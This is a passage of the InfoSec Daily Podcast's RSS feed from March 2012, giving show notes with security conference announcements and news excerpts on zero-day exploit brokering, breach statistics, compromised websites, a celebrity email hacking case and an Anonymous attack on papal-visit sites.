	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Guests: oncee, connection, and spridel</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Announcements:</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">InfoSec Southwest<br />
	</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: March 30-April 1, 2012<br />
	Where: Austin, Texas<br />
	</span><a href="http://www.infosecsouthwest.com/"><span>http://www.Infosecsouthwest.com</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Outerz0ne 8<br />
	</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: April 20-21, 2012<br />
	Where: Wellesley Inn, Atlanta GA<br />
	</span><a href="http://www.outerz0ne.org/"><span>http://www.outerz0ne.org</span></a><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Linuxfest Northwest 2012<br />
	</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: Saturday, April 28-29, 2012<br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">AIDE 2012<br />
	</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 21-25, 2012<br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br />
	</span><a href="http://www.appyide.org/"><span>http://www.appyide.org/</span></a></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">who will be there? Borris, Relik, IronGeek, oncee, spridel, Hackett</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">LayerOne 2012<br />
	</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 26-27, 2012<br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br />
	</span><a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: June 20 &#8211; 27, 2012<br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span> <br />
	</span><span>http://www.sans.org/mentor/details.php?nid=28014</span></a></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Social Engineering Training</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21-24, 2012<br />
	Where: Black Hat Vegas</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: August 20-24, 2012<br />
	Where: &nbsp;Bristol, UK</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;November 12-16, 2012<br />
	Where: &nbsp;Columbia, MD</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Inside and Out of the Social-Engineer Toolkit (SET)<br />
	</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21 &#8211; 22, 2012<br />
	When: July 23 &#8211; 24, 2012<br />
	Where: Black Hat Vegas<br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span>http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br />
	</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;September 27-30, 2012<br />
	Where: Louisville, KY<br />
	</span><a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Skydogcon</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"><br />
	When: October 26-28<br />
	Where: Hotel Preston in Nashville, TN <br />
	</span><a href="http://www.skydogcon.com/"><span>http://www.skydogcon.com</span></a><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"> and locate the Affiliate Program link on the right hand side.</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Shout out to all those competing at Western Regional CCDC on both Blue and Red teams.</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b>Stories</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Source: </span><a href="http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/"><span>http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/</span></a></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">A clever hacker today has to make tough choices. Find a previously unknown method for dismantling the defenses of a device like an iPhone or iPad, for instance, and you can report it to Apple and present it at a security conference to win fame and lucrative consulting gigs. Share it with HP&rsquo;s Zero Day Initiative instead and earn as much as $10,000 for helping the firm shore up its security gear. Both options also allow Apple to fix its bugs and make the hundreds of millions of iPhone and iPad users more secure.</span></b></p>
<p><b><br />
	<span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">But any hacker who happens to know one Bangkok-based security researcher who goes by the handle &ldquo;the Grugq&rdquo;&ndash;or someone like him&ndash;has a third option: arrange a deal through the pseudonymous exploit broker to hand the exploit information over to a government agency, don&rsquo;t ask too many questions, and get paid a quarter of a million dollars&ndash;minus the Grugq&rsquo;s 15% commission.</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">That iOS exploit price represents just one of the dozens of deals the Grugq (pictured above) has arranged in his year-old side career as a middle man for so-called &ldquo;zero-day&rdquo; exploits, hacking techniques that take advantage of secret vulnerabilities in software. Since he began hooking up his hacker friends with contacts in government a year ago, the Grugq says he&rsquo;s on track to earn a million in revenue this year. He arranged the iOS deal last month, for instance, between a developer and a U.S. government contractor. In that case, as with all of his exploit sales, he won&rsquo;t offer any other details about the buyer or the seller.</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">&hellip;</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><a href="http://www.verizonbusiness.com/resources/reports/rp_data-breach-investigations-report-2012_en_xg.pdf"><span>http://www.verizonbusiness.com/resources/reports/rp_data-breach-investigations-report-2012_en_xg.pdf</span></a></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">WHO IS BEHIND DATA BREACHES??</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">98% stemmed from external agents (+6%)</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">4% implicated internal employees (-13%)</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">&lt;1% committed by business partners (&lt;&gt;)</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">58% of all data theft tied to activist groups</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">HOW DO BREACHES OCCUR?</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">81% utilized some form of hacking (+31%) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt; &#8212;CLICKING SHIT!</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">69% incorporated malware (+20%)</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">10% involved physical attacks (-19%)</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">7% employed social tactics (-4%)</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">5% resulted from privilege misuse (-12%)</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">WHAT COMMONALITIES EXIST?</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">79% of victims were targets of opportunity (-4%)</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">96% of attacks were not highly difficult (+4%)</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">94% of all data compromised involved servers (+18%)</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">85% of breaches took weeks or more to discover (+6%)</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">92% of incidents were discovered by a third party (+6%)</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">97% of breaches were avoidable through simple or </span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">intermediate controls (+1%)</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">96% of victims subject to PCI Dss had not achieved</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">compliance (+7%)</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">&hellip;</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><a href="http://www.computerworld.com/s/article/9225442/Most_web_masters_don_t_know_how_their_sites_got_hacked_report_says">http://www.computerworld.com/s/article/9225442/Most_web_masters_don_t_know_how_their_sites_got_hacked_report_says</a></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Most owners of compromised websites don&#039;t know how their sites got hacked into and only 6 percent detect the malicious activity on their own, according to a report released by StopBadware and Commtouch on Thursday.</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>The new &quot;</span><a href="http://www.stopbadware.org/pdfs/compromised-websites-an-owners-perspective.pdf"><span>Compromised Websites: An Owner&#039;s Perspective</span></a><span>&quot; report is based on a survey of over 600 website administrators and owners that was carried out over several months by security vendor Commtouch and StopBadware, a nonprofit organization that helps webmasters identify, remediate and prevent website compromises.</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>The leading cause of website compromises appears to be outdated content management software (CMS). This was indicated as a reason for their websites being hacked by 20 percent of respondents.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">&hellip;</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><a href="http://www.zdnet.com/blog/security/celebrity-hacker-to-plead-guilty/11036"><span>http://www.zdnet.com/blog/security/celebrity-hacker-to-plead-guilty/11036</span></a></b></p>
<p><b><br />
	<span>35-year-old Christopher Chaney of Jacksonville, Florida, has agreed to plead guilty on Monday for hacking into the e-mail accounts of multiple celebrities. He gained access to nude photos and other private information belonging to Christina Aguilera, Mila Kunis, Scarlett Johansson, and other victims identified only by their initials (B.P., J.A., L.B., and L.S.).</span></b></p>
<p><b><span>Chaney has been charged with nine criminal counts, including unauthorized access to a computer and wiretapping, according to a plea agreement filed in the U.S. District Court in Los Angeles. The charges carry a maximum sentence of 60 years in prison, according to CBS News, although he will likely get less time behind bars because of federal sentencing guidelines.</span></b></p>
<p><b><span>Chaney was arrested last October after an 11-month investigation dubbed &ldquo;Operation Hackerazzi&rdquo; by the Federal Bureau of Investigation (</span><a href="http://www.fbi.gov/"><span>FBI</span></a><span>). In the plea agreement, prosecutors say that between November 2010 and October 2011, Chaney hacked into the accounts of more than 50 members of the entertainment industry. He obtained private communications, photos, business contracts, scripts, and other information from his victims. An FBI search warrant said Chaney&rsquo;s hard drive contained numerous private celebrity photos and a document that compiled their extensive personal data.</span></b></p>
<p><b><span>According to prosecutors, he then forwarded some of the private photos to another hacker and two gossip websites, but authorities found no evidence showing he profited from his scheme. Chaney says he did not leak the photos, explains he was doing the hacking out of pure curiosity, and apologized for his actions. As you can see in the video above, courtesy of The Washington Post, he appears remorseful in the interview, which was taken shortly after his indictment.</span></b></p>
<p>&#8230;</p>
<p><b><span>Source:</span><span> </span><a href="http://abcnews.go.com/International/wireStory/anonymous-hackers-block-mexico-pope-visit-sites-15982502#.T25ocuxSQhc"><span>http://abcnews.go.com/International/wireStory/anonymous-hackers-block-mexico-pope-visit-sites-15982502#.T25ocuxSQhc</span></a></b></p>
<p><b><span>The hacker group Anonymous in Mexico crashed at least two of the websites for Pope Benedict XVI&#039;s upcoming visit to Mexico on Thursday, claiming the papal visit is a political move to support the conservative National Action party.</span></b></p>
<p><b><span>Samuel Najera, spokesman for the Mexican Episcopal Conference, said its web page on the papal visit was blocked by &quot;a cyber attack.&quot;</span></b></p>
<p><b><span>&quot;We have been aware of the threat that has been making the rounds on social networks, that was brought to fruition today,&quot; Najera said. &quot;This is part of a dynamic these days of a lack of safety and acts of intolerance toward certain groups.&quot;</span></b></p>
<p><b><span>&quot;For the moment, this does damage to the logistics&quot; of the papal visit, Najera said.</span><br />
	<span>The site contained information on the pope&#039;s planned activities starting Friday in the north-central state of Guanajuato, which is governed by President Felipe Calderon&#039;s National Action Party, or PAN.</span></b></p>
<p><b><span>The Anonymous IberoAmerica website, which has been a channel of communication for such hacker &quot;ops&quot; in the past, said the site crashes were the result of Anonymous operations with names such &quot;Pharisee&quot; and &quot;freeloader.&quot;</span></b></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-628-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3684/0/infosec-daily-podcast-episode-628.mp3" length="16891605" type="audio/mpeg" />
		<itunes:duration>0:35:11</itunes:duration>
		<itunes:subtitle>Episode 628 &#8211; Weekend Wrap-up with Dr. b0n3z
InfoSec Daily Podcast Episode 628 for March 24, 2012. Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlick, and Themson Mester.

	
Guests: oncee, connection, and spridel

	
Announcements:
[...]</itunes:subtitle>
		<itunes:summary>Episode 628 &#8211; Weekend Wrap-up with Dr. b0n3z
InfoSec Daily Podcast Episode 628 for March 24, 2012. Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlick, and Themson Mester.

	
Guests: oncee, connection, and spridel

	
Announcements:
InfoSec Southwest
	When: March 30-April 1, 2012
	Where: Austin, Texas
	http://www.Infosecsouthwest.com

	
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
	http://www.outerz0ne.org 

	
Linuxfest Northwest 2012
	When: Saturday, April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/

	
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
who will be there? Borris, Relik, IronGeek, oncee, spridel, Hackett

	
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org

	
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training

	
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html

	
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com

	
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 

	
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.

	
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Shout out to all those competing at Western Regional CCDC on both Blue and Red teams.

	
Stories
Source: http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/
A clever hacker today has to make tough choices. Find a previously unknown method for dismantling the defenses of a device like an iPhone or iPad, for instance, and you can report it to Apple and present it at a security conference to win fame and lucrative consulting gigs. Share it with HP&#8217;s Zero Day Initiative instead and earn as much as $10,000 for helping the firm shore up its security gear. Both options also allow Apple to fix its bugs and make the hundreds of millions of iPhone and iPad users more secure.

	But any hacker who happens to know one Bangkok-based security researcher who goes by the handle &#8220;the Grugq&#8221;&#8211;or someone like him&#8211;has a third option: arrange a deal through the pseudonymous exploit broker to hand the exploit information over to a government agency, don&#8217;t ask too many questions, and get paid a quarter of a million dollars&#8211;minus the Grugq&#8217;s 15% commission.
That iOS exploit price represents just one of the dozens of deals the Grugq (pictured above) has arranged in his year-old side career as a middle man for so-called &#8220;zero-day&#8221; exploits, hacking techniques that take advantage of secret vulnerabilities in software. Since he began hooking up his hacker friends with contacts in government a year ago, the Grugq says he&#8217;s on track to earn a million in revenue this year. He arranged the iOS deal last month, for instance, between a developer and a U.S. government contractor. In that case, as with all of his exploit sales, he won&#8217;t offer any o[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 627 &#8211; No Password For You, Added an “S”, No Damage, PayPal, Epilepsy Foundation and Android Malware</title>
		<link>http://www.isdpodcast.com/episode-627-no-password-for-you-added-an-s-no-damage-paypal-epilepsy-foundation-and-android-malware</link>
		<comments>http://www.isdpodcast.com/episode-627-no-password-for-you-added-an-s-no-damage-paypal-epilepsy-foundation-and-android-malware#comments</comments>
		<pubDate>Sat, 24 Mar 2012 00:51:20 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3680</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 627 for March 23, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester, and Dr. Bonez. &#160; Announcements: InfoSec Southwest When: March 30-April 1, 2012 Where: Austin, Texas http://www.Infosecsouthwest.com &#160; Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: Saturday, [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 627 for March 23, 2012. </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester, and Dr. Bonez.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1, 2012<br class="kix-line-break" /><br />
	Where: Austin, Texas<br class="kix-line-break" /><br />
	</span><a href="http://www.infosecsouthwest.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA<br class="kix-line-break" /><br />
